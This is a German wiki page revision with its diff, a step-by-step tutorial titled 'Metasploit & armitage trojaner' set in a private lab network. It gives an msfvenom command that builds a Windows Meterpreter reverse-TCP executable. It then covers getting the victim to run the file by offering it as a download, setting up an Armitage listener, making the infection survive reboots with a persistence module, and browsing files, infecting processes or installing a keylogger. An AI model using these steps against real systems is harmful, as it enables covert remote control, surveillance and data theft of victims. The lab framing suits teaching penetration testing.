Metasploit & armitage trojaner: Unterschied zwischen den Versionen
David (Diskussion | Beiträge) |
David (Diskussion | Beiträge) |
||
Zeile 4: | Zeile 4: | ||
setup Opfer | setup Opfer | ||
− | Windows 7 | + | Windows 7 Domain Rechner |
Benutzer: Admin | Benutzer: Admin | ||
ip: 192.168.242.76 | ip: 192.168.242.76 | ||
Zeile 13: | Zeile 13: | ||
[[Datei:7 trojaner.png]] | [[Datei:7 trojaner.png]] | ||
=dem opfer das programm unterschieben= | =dem opfer das programm unterschieben= | ||
− | das opfer muss dazu gebracht werden das | + | das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an |
[[Datei:8 opfer.png]] | [[Datei:8 opfer.png]] | ||
− | auf der opfer | + | auf der opfer Seite |
[[Datei:12 schadeware.png]] | [[Datei:12 schadeware.png]] | ||
− | = | + | =Kontrolle übernehmen= |
− | nun starten | + | nun starten wir erst metasploit und danach armitage |
[[Datei:1armitagestarten.png]] | [[Datei:1armitagestarten.png]] | ||
− | wenn armitage | + | wenn armitage gestartet ist erstellen wir einen Server zum lauschen |
*payload | *payload | ||
**windows | **windows | ||
Zeile 35: | Zeile 35: | ||
und warten darauf das sich unser opfer verbindet | und warten darauf das sich unser opfer verbindet | ||
− | nun erscheint oben rechts der opfer | + | nun erscheint oben rechts der opfer Computer |
=Dauerhaft infizieren= | =Dauerhaft infizieren= | ||
− | als nächstes wollen | + | als nächstes wollen wir den Trojaner dauerhaft speichern |
− | wir suchen nach | + | wir suchen nach persist und geben einen neuen Port an |
[[Datei:200persist.png]] | [[Datei:200persist.png]] | ||
− | wen der | + | wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden |
− | diese kann ein par | + | diese kann ein par Minuten dauern |
=Was kann man machen= | =Was kann man machen= | ||
− | jetzt gibt es viele | + | jetzt gibt es viele Möglichkeiten |
− | * | + | *Rechtsklick infizierter pc |
**meterpreter | **meterpreter | ||
***explore | ***explore | ||
− | hier können wir uns Prozesse oder | + | hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw |
− | =kurz Beispiel | + | =kurz Beispiel keylogger= |
− | [[metasploit & armitage | + | [[metasploit & armitage keylogger]] |
Version vom 23. August 2016, 14:07 Uhr
setup Hacker
Kali linux ip: 192.168.242.91
setup Opfer
Windows 7 Domain Rechner Benutzer: Admin ip: 192.168.242.76
Trojaner erstellen
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx --format=exe > program.exe
dem opfer das programm unterschieben
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an
auf der opfer Seite
Kontrolle übernehmen
nun starten wir erst metasploit und danach armitage
wenn armitage gestartet ist erstellen wir einen Server zum lauschen
- payload
- windows
- metapreter
- windows
hier passen wir den LPORT an
und warten darauf das sich unser opfer verbindet
nun erscheint oben rechts der opfer Computer
Dauerhaft infizieren
als nächstes wollen wir den Trojaner dauerhaft speichern
wir suchen nach persist und geben einen neuen Port an
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden
diese kann ein par Minuten dauern
Was kann man machen
jetzt gibt es viele Möglichkeiten
- Rechtsklick infizierter pc
- meterpreter
- explore
- meterpreter
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw